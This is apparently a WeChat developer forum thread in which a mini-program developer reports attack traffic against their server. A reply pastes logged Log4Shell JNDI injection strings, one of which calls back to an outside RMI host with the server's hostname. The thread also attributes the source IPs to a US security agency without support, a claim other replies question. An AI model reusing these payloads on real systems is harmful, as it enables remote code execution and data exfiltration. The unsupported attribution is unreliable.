小程序
小游戏
企业微信
微信支付
扫描小程序码分享
更新小程序代码后,受到模拟攻击,攻击数据被拦截,发现几个国外IP地址,是美国安全部(183.47.120.213 / 11.187.178.158 / 9.4.131.68 / 101.91.62.170 )的,需要解释为什么模拟攻击会有数据包反回国外IP地址。
3 个回答
加粗
标红
插入代码
插入链接
插入图片
上传视频
今天发现,小程序服务端被攻击了:
代码:
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"\",\
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"aaaa
"Query\":{\"Fmatname\":\"${jndi:rmi://hostname-${hostName}.
${jndi:rmi://hostname-${hostName}. 这是一个java 日志的漏洞,还好我不是java写的
sql注入,还是我没有用动态拼接sql
发现,请求的ip基本的是国外的,但我发现其中有这样的代码:
${jndi:rmi://183.47.120.213:1099/bypassb3299945ddb08d9567806303c38acfc6-/-${hostName}}
查了一下,是广东某机房的ip,貌似想把数据回传给这个ip
它们这次攻击注定是不成功的,因为它们没有破解,我登陆这一关。
说好,中国人不坑中国人,中国人必须团结起来,一致对外呀。
你好,麻烦通过点击下方“反馈信息”按钮,提供出现问题的。
怎么会知道是美国安全部这种信息呢
基本都是虚拟ip
关注后,可在微信内接收相应的重要提醒。
请使用微信扫描二维码关注 “微信开放社区” 公众号
今天发现,小程序服务端被攻击了:
代码:
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"\",\
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"\",\
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"aaaa
"Query\":{\"Fmatname\":\"${jndi:rmi://hostname-${hostName}.
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"\",\
"Query\":{\"Fmatname\":\"\",\"Ffun\":\"\",\"Flight\":\"\",\
${jndi:rmi://hostname-${hostName}. 这是一个java 日志的漏洞,还好我不是java写的
sql注入,还是我没有用动态拼接sql
发现,请求的ip基本的是国外的,但我发现其中有这样的代码:
${jndi:rmi://183.47.120.213:1099/bypassb3299945ddb08d9567806303c38acfc6-/-${hostName}}
查了一下,是广东某机房的ip,貌似想把数据回传给这个ip
它们这次攻击注定是不成功的,因为它们没有破解,我登陆这一关。
说好,中国人不坑中国人,中国人必须团结起来,一致对外呀。
怎么会知道是美国安全部这种信息呢
基本都是虚拟ip